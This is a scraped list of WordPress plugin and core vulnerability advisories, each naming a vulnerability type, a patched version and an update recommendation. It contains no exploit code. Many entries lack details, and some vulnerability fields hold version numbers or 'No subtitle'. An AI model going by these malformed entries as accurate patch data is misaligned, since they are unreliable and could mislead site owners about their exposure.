Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: BannerMan

Plugin: Stock Locations for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Keyring

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: DupeOff

Plugin: Cookie Notification Plugin for WordPress – WP Cookie User Info

Vulnerability: SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple File List

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 6.1.10
Recommended Action: Update to version 6.1.10, or a newer patched version

Plugin: Homepage Pop-up

Core: WordPress

Vulnerability: Cross-Site Request Forgery via Uploading Flash File
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: SyntaxHighlighter Evolved

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.10
Recommended Action: Update to version 3.1.10, or a newer patched version

Plugin: Custom Base Terms

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘base’
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Our Services Showcase

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Improper Authorization via WPCom External Media REST endpoints
Patched Version: 12.7
Recommended Action: Update to version 12.7, or a newer patched version

Plugin: WP Site Protect

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 7.3.3
Patched Version: 7.3.4
Recommended Action: Update to version 7.3.4, or a newer patched version

Plugin: Tippy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via tippy shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Classic Editor +

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.15
Recommended Action: Update to version 3.0.15, or a newer patched version

Plugin: Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms

Vulnerability: Open Redirect
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Custom Field For WP Job Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Qe SEO Handyman

Plugin: Marekkis Watermark-Plugin

Plugin: ووکامرس فارسی

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.9.8
Recommended Action: Update to version 5.9.8, or a newer patched version

Plugin: Product Reviews Import Export for WooCommerce

Vulnerability: CSV Injection
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Customer Service Software & Support Ticket System

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.10.4
Recommended Action: Update to version 5.10.4, or a newer patched version

Plugin: Responsive Filterable Portfolio

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.20
Recommended Action: Update to version 1.0.20, or a newer patched version

Plugin: WooCommerce JazzCash Gateway Plugin

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Akismet Anti-spam: Spam Protection

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Razorpay for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.7
Recommended Action: Update to version 4.5.7, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.18
Recommended Action: Update to version 1.8.18, or a newer patched version

Plugin: ACF Photo Gallery Field

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Aparat

Plugin: Slider Hero with Video Background, Animation

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 8.2.1
Recommended Action: Update to version 8.2.1, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Directory Traversal
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Server Status by Hostname/IP

Vulnerability: SQL Injection
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Access Bypass Control
Patched Version: 8.9.3
Recommended Action: Update to version 8.9.3, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via ‘yrc_lang[Videos]’
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: simpleSAMLphp Authentication

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 13.2.2
Recommended Action: Update to version 13.2.2, or a newer patched version

Plugin: WooCommerce Product Carousel Slider

Plugin: OnePress Opt-In Panda

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WRC Pricing Tables – Responsive CSS3 Pricing Tables

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated Remote Code Execution
Patched Version: 5.0.1
Recommended Action: Update to version 5.0.1, or a newer patched version

Plugin: Stream

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: HAL

Vulnerability: No subtitle
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect via wp_validate_redirect
Patched Version: 3.7.13
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.13, 3.8.13, 3.9.11, 4.0.10, 4.1.10, 4.2.7, 4.3.3, 4.4.2

Plugin: Jobs for WordPress

Vulnerability: Authenticated (Author+) Cross Site Scripting
Patched Version: 2.5.11
Recommended Action: Update to version 2.5.11, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Insecure Password Reset Mechanism
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross Site Request Forgery
Patched Version: 6.0.3.0
Recommended Action: Update to version 6.0.3.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery via ts_reset_tracking_setting
Patched Version: 5.14.2
Recommended Action: Update to version 5.14.2, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 6.10.5
Recommended Action: Update to version 6.10.5, or a newer patched version

Plugin: Hustle – Email Marketing, Lead Generation, Optins, Popups

Vulnerability: No subtitle
Patched Version: 7.6.6
Recommended Action: Update to version 7.6.6, or a newer patched version

Plugin: Adning Advertising

Vulnerability: Unauthenticated Arbitrary File Deletion via Path Traversal
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Anthologize

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.8.1
Recommended Action: Update to version 0.8.1, or a newer patched version

Plugin: Backup and Restore plugin – WordPress

Vulnerability: Authenticated (Admin+) Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugin Logic

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Arbitrary File Upload
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Participants Database

Vulnerability: Cross Site Request Forgery
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: wp-html-sitemap

Plugin: Simple:Press Forum

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via Profile Signatures
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: FL3R FeelBox

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.4.6.1
Recommended Action: Update to version 2.4.6.1, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insecure Direct Object References
Patched Version: 7.5
Recommended Action: Update to version 7.5, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Button Generator – easily Button Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Responsive WordPress Slider – Avartan Slider Lite

Vulnerability: Reflected Cross-Site Scripting via ‘asview-nouce’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Reflected Cross-Site Scripting and Information Disclosure
Patched Version: 7.1.14
Recommended Action: Update to version 7.1.14, or a newer patched version

Plugin: Kama Click Counter

Vulnerability: Blind SQL Injection
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Regular Expression Denial of Service (ReDoS)
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Settings Import to Privilege Escalation
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Portable phpMyAdmin

Vulnerability: Authentication Bypass
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Electric Studio Client Login

Plugin: Duplicate Post

Vulnerability: SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Reflected Cross-Site Scripting via ‘post_status’
Patched Version: 5.12.6
Recommended Action: Update to one of the following versions, or a newer patched version: 5.12.6, 6.1.6

Plugin: Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Settings Update to Stored Cross-Site Scripting
Patched Version: 11.0.7
Recommended Action: Update to version 11.0.7, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: WP Microblogs

Plugin: Stop User Enumeration

Vulnerability: Username Enumeration Bypasses
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Woocommerce Vietnam Checkout

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Feedify – Web Push Notifications

Vulnerability: No subtitle
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Login as User or Customer

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Time Sheets

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.29.3
Recommended Action: Update to version 1.29.3, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Captcha Bypass
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Diary & Availability Calendar

Plugin: WP Business Intelligence Lite

Vulnerability: SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: JW Player for Flash & HTML5 Video

Vulnerability: Cross-Site Request Forgery leading to player deletion
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: ReDi Restaurant Reservation

Vulnerability: Missing Authorization
Patched Version: 23.0212
Recommended Action: Update to version 23.0212, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: SQL Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Companion Auto Update

Vulnerability: Local File Inclusion
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: PixFields

Plugin: TemplatesNext ToolKit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Erident Custom Login and Dashboard

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: SQL Injection via option_id
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Smart External Link Click Monitor [Link Log]

Vulnerability: SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Backup Migration

Vulnerability: Sensitive Information Exposure
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Webmaster Tools

Plugin: TheCartPress eCommerce Shopping Cart

Plugin: Email posts to subscribers

Plugin: Stock Ticker

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 3.23.1
Recommended Action: Update to version 3.23.1, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: Blind SQL Injection via imgid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Content Staging

Plugin: Hover Effects – easily create any hover effect

Vulnerability: Authenticated Local File Inclusion
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Copy Anything to Clipboard

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Shopp

Plugin: Rockhoist Ratings

Vulnerability: SQL Injection
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: MailPress

Plugin: DiveBook

Plugin: Image Regenerate & Select Crop

Vulnerability: Cross-Site Request Forgery on multiple AJAX actions
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Plugin: Coming Soon & Maintenance Mode by Colorlib

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 1.0.99
Recommended Action: Update to version 1.0.99, or a newer patched version

Plugin: Church Admin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.30
Recommended Action: Update to version 3.7.30, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Social Media Flying Icons | Floating Social Media Icon

Plugin: WP EasyPay – Create Your Payment Forms to Pay with Square – Square for WordPress Plugin: Integrate Square with WordPress to Collect Payments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Animated Number Counters

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: FreshMail For WordPress

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: WordPress InviteBox Plugin

Plugin: video carousel slider with lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.23
Recommended Action: Update to version 1.0.23, or a newer patched version

Plugin: WP User Switch

Vulnerability: Authenticated (Subscriber+) Authentication Bypass via Cookie
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: CP Blocks

Vulnerability: Authenticated Stored Cross-Site Scripting via License ID settings
Patched Version: 1.0.15
Recommended Action: Update to version 1.0.15, or a newer patched version

Plugin: Slide Anything – Responsive Content / HTML Slider and Carousel

Vulnerability: Editor+ Cross-Site Scripting
Patched Version: 2.3.44
Recommended Action: Update to version 2.3.44, or a newer patched version

Plugin: Real Cookie Banner: GDPR & ePrivacy Cookie Consent

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.4.10
Recommended Action: Update to version 3.4.10, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Directory Traversal
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.8
Recommended Action: Update to version 3.3.8, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WordPress Social Login

Plugin: Nooz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Race Condition to Remote Code Execution
Patched Version: 9.2.0
Recommended Action: Update to version 9.2.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: WP SVG Icons

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.20.7.13
Recommended Action: Update to version 1.20.7.13, or a newer patched version

Plugin: Simple Yearly Archive

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Health Check & Troubleshooting

Vulnerability: Cross-Site Request Forgery via health_check_troubleshoot_get_captures
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Maspik – Advanced Spam Protection

Vulnerability: Unauthenticated Stored Cross-Site Scripting via efas_add_to_log
Patched Version: 0.9.3
Recommended Action: Update to version 0.9.3, or a newer patched version

Plugin: Acumbamail

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.0.4.1
Recommended Action: Update to version 1.0.4.1, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Uploadify Integration

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Local File Inclusion
Patched Version: 0.8.6.0
Recommended Action: Update to version 0.8.6.0, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.3.4
Recommended Action: Update to version 5.3.4, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: plugnedit

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Zoho CRM Lead Magnet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.9.2
Recommended Action: Update to version 1.6.9.2, or a newer patched version

Plugin: FeedWordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2015.0426
Recommended Action: Update to version 2015.0426, or a newer patched version

Plugin: Loginizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: CSV Injection
Patched Version: 6.5.4
Recommended Action: Update to version 6.5.4, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Missing Authorization
Patched Version: 4.2.3.1
Recommended Action: Update to version 4.2.3.1, or a newer patched version

Plugin: Photoracer Plugin

Plugin: VDZ Google Analytics or Google Tag Manager / GTM

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Blogstand Banner

Plugin: Copify

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.4.36
Recommended Action: Update to version 1.4.36, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Information Disclosure, Modification, and Denial of Service
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: WP eCommerce

Vulnerability: Missing Authorization
Patched Version: 3.8.14.4
Recommended Action: Update to version 3.8.14.4, or a newer patched version

Plugin: Dropshipping and affiliates for Amazon and woocommerce

Plugin: Advanced Floating Content Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: File Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Perfect Survey

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: SQL Injection
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Name Directory

Vulnerability: Cross Site Request Forgery
Patched Version: 1.27.2
Recommended Action: Update to version 1.27.2, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: SyntaxHighlighter Evolved

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Amazon Affiliate

Vulnerability: Reflected File Download
Patched Version: 3.12.3
Recommended Action: Update to version 3.12.3, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: SQL Injection
Patched Version: 2.5.1.2
Recommended Action: Update to version 2.5.1.2, or a newer patched version

Plugin: Invite Anyone

Vulnerability: Email Injection
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: Clean-Contact

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Admin+) Arbitrary File Deletion
Patched Version: 3.6.25
Recommended Action: Update to version 3.6.25, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Cross-Site Scripting via Search Parameter
Patched Version: 2.0.3.1
Recommended Action: Update to version 2.0.3.1, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Unauthenticated Arbitrary Password Reset to Privilege Escalation
Patched Version: 5.7.2
Recommended Action: Update to version 5.7.2, or a newer patched version

Plugin: Mobile Banner

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Changes
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: dwnldr

Vulnerability: Cross-Site Scripting
Patched Version: 1.01
Recommended Action: Update to version 1.01, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: Advanced iFrame

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2023.9
Recommended Action: Update to version 2023.9, or a newer patched version

Plugin: Bus Ticket Booking with Seat Reservation – WpBusTicketly | WordPress plugin

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Responsive Contact Form Builder & Lead Generation Plugin

Vulnerability: Arbitrary Settings Change
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: WP-Cache.com

Plugin: AI Contact Us Form

Plugin: Simple File List

Vulnerability: Cross-Site Request Forgery to Page Creation
Patched Version: 4.4.13
Recommended Action: Update to version 4.4.13, or a newer patched version

Plugin: WordPress Advanced Ticket System, Elite Support Helpdesk

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.64
Recommended Action: Update to version 1.0.64, or a newer patched version

Plugin: CM Pop-Up Banners for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Authenticated(Subscriber+) Server Side Request Forgery
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: Social Share Buttons by Supsystic

Vulnerability: SQL Injection
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Admin renamer extended

Plugin: Plugins List

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via replace_plugin_list_tags
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: AdminPad

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: JetFormBuilder — Dynamic Blocks Form Builder

Vulnerability: Authenticated (Author+) Privilege Escalation
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Information Exposure
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Core: WordPress

Vulnerability: 2.3.1
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.11.20
Recommended Action: Update to version 1.11.20, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.3.5
Recommended Action: Update to version 5.3.5, or a newer patched version

Plugin: SMTP Mail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: 2.9.42
